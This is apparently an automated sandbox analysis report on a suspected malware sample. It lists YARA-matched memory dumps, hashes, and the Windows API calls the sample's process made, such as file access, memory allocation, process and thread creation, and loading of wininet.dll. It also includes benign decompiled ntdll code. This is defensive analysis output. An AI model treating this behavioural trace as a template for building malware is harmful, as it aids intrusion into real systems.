                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                            • Instruction ID: 7f541cce7341b726ca3189041fa932a6336af74422518780cffbe53c04ca977f
                                            • Opcode Fuzzy Hash: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                            • Instruction Fuzzy Hash: 06B092B29024D9CAEB11E7B05A08B2B7E00BBE0741F26C562E2020685B4779C4D1F6F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45cd188c90423a8ff0df6b6357dcb7c11e8f8b457759b234f3c04948392e3dec
                                            • Instruction ID: f8514cecbd4cc92bbf1bbe748015c6f87ef303c5aa5e8e30fe36f7e12e7b5e25
                                            • Opcode Fuzzy Hash: 45cd188c90423a8ff0df6b6357dcb7c11e8f8b457759b234f3c04948392e3dec
                                            • Instruction Fuzzy Hash: 98C01232A551158AD3300D1DA8A01B5F7B4A79A624F10677AD808EB991CB56D407518C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            C-Code - Quality: 53%
                                            			E00A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E00A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E00A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E00A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A5FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A5FE2B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02B13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02B1861D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02B13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02B13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02B1861D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(02B13D62,5E972F65,FFFFFFFF,02B13A21,?,?,02B13D62,?,02B13A21,FFFFFFFF,5E972F65,02B13D62,?,00000000), ref: 02B186C5
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(02B13D62,5E972F65,FFFFFFFF,02B13A21,?,?,02B13D62,?,02B13A21,FFFFFFFF,5E972F65,02B13D62,?,00000000), ref: 02B186C5
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02B02D11,00002000,00003000,00000004), ref: 02B187E9
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(02B13D40,?,?,02B13D40,00000000,FFFFFFFF), ref: 02B18725
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtClose.NTDLL(02B13D40,?,?,02B13D40,00000000,FFFFFFFF), ref: 02B18725
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(02B13526,?,02B13C9F,02B13C9F,?,02B13526,?,?,?,?,?,00000000,00000000,?), ref: 02B188CD
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B1890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree
                                            • String ID: .z`
                                            • API String ID: 2488874121-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02B17398
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02B17398
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B1890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02B03B93), ref: 02B1890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B072DA
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B072FB
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                            • Instruction ID: 193343ac9bde109fdfd41db8778961f7ae41b79ad2d00451eb017cac79a0ac35
                                            • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                            • Instruction Fuzzy Hash: 8401A771A8022877E721B6948C42FBEBB6C9F05F51F154194FF04BA1C1EA94790586F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02B072DA
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02B072FB
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 544325075cd1956e68d7ae5776c679449290151af025703f7fc05e0bad29066c
                                            • Instruction ID: 20f17bbc8b75ca521dbabef8f5ac40657a00860f732f80de505b6b7e6a109143
                                            • Opcode Fuzzy Hash: 544325075cd1956e68d7ae5776c679449290151af025703f7fc05e0bad29066c
                                            • Instruction Fuzzy Hash: 00F04672B8021936E62265502C42FFEF3489B44B50F5900F9FF44EB1C0FE90A80646F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B09BA2
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction ID: 86c34b392a70d5eaed4f8c2aef4ed5c8d6fb71717848b2946c658ffce8c2db9c
                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction Fuzzy Hash: 74011EB5E0020DABDF10DAA4DC81F9DB7799F54708F1081E5E90897281F671EB14CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02B189A4
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: da354fbe37fb7e2fe797abf629c6b4dcbfc1741c649b11708f6bd63ba829fec7
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: 0B01AFB2210108BBCB58DF89DC84EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B0CCE0,?,?), ref: 02B1745C
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 3fbe0539843078ebb3f63e9b6130849855d2d7181e80f546e0c4fffbb1920b8b
                                            • Instruction ID: 4143b3ee228290fa14bb866d7a7a68ea8aeedf20e5aa383b521854deebd31508
                                            • Opcode Fuzzy Hash: 3fbe0539843078ebb3f63e9b6130849855d2d7181e80f546e0c4fffbb1920b8b
                                            • Instruction Fuzzy Hash: F8E092333803043AE3306599AC02FA7B79CCB85B20F540066FB0DEB2C0E995F80146A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02B0CCE0,?,?), ref: 02B1745C
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: bb35da5f31cd7ba660aa6b3b9258eca160e2aeb809bd0946b8ce3aebb5327291
                                            • Instruction ID: d99d9f6922705a06c0c4d03dabcbb7fe46e7f3563e9d19343d5993181c71cf97
                                            • Opcode Fuzzy Hash: bb35da5f31cd7ba660aa6b3b9258eca160e2aeb809bd0946b8ce3aebb5327291
                                            • Instruction Fuzzy Hash: DEF02B336903403AD3306AA84C43FE7BBE88B91F10F9801ADF649FB2C1D991F4014664
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02B0CFB2,02B0CFB2,?,00000000,?,?), ref: 02B18A70
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: de5a78040ad7ab25810946c40f385756d6242e17b4adecc08d93efb98f0bdadc
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 1BE01AB12002086BDB14DF49CC84EE737ADAF88650F018154BE0857241C930E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(02B13526,?,02B13C9F,02B13C9F,?,02B13526,?,?,?,?,?,00000000,00000000,?), ref: 02B188CD
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 46f2c0d2cead561ef4c7c832e0be5ad47bc733c6c0fa651a656e9fbf3f1804a8
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: BEE012B1200208ABDB18EF99CC44EA777ADAF88650F118598BE089B241C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,02B07C83,?), ref: 02B0D44B
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, Offset: 02B00000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                            • Instruction ID: b472a888c1aac6d40761063b993e48060b120f265a9f61755b4dc2b604867786
                                            • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                            • Instruction Fuzzy Hash: 3BD0A7727503043BE610FAE49C03F2676CD9B44B04F4940B4F948D73C3EA54F4004571
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7a3782d0a89eede3fd81b7af9b73a05e2da41d2b2bb7cab550adefa8614ea6b2
                                            • Instruction ID: cc0ad41bf6da2cea570882f38d65d6c41a29a2c4da2f9004fda85cecc3935dc2
                                            • Opcode Fuzzy Hash: 7a3782d0a89eede3fd81b7af9b73a05e2da41d2b2bb7cab550adefa8614ea6b2
                                            • Instruction Fuzzy Hash: AEB02BB18010C0C5F700E7605608F17394077E0300F12C021D1020240A0738D080F1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 53%
                                            			E045CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E0457CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E045C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E045C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045CFDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045CFE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045CFE2B
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.516035233.0000000004510000.00000040.00000001.sdmp, Offset: 04510000, based on PE: true
                                            • Associated: 00000010.00000002.516513792.000000000462B000.00000040.00000001.sdmp
                                            • Associated: 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 2c33ee70a7ef96822eb9181147046f44c7dac220ad25632fe5dcf0c43fc72bf0
                                            • Instruction ID: 6a5f15c3935c1134637a669a25b642b44c3ca8232b420d1fca78fc7876ccb2d2
                                            • Opcode Fuzzy Hash: 2c33ee70a7ef96822eb9181147046f44c7dac220ad25632fe5dcf0c43fc72bf0
                                            • Instruction Fuzzy Hash: 5BF0F637240211BFE6211A85DC06F23BB5AFB85770F244319F628561E1EA62F860E6F4
                                            Uniqueness

                                            Uniqueness Score: -1.00%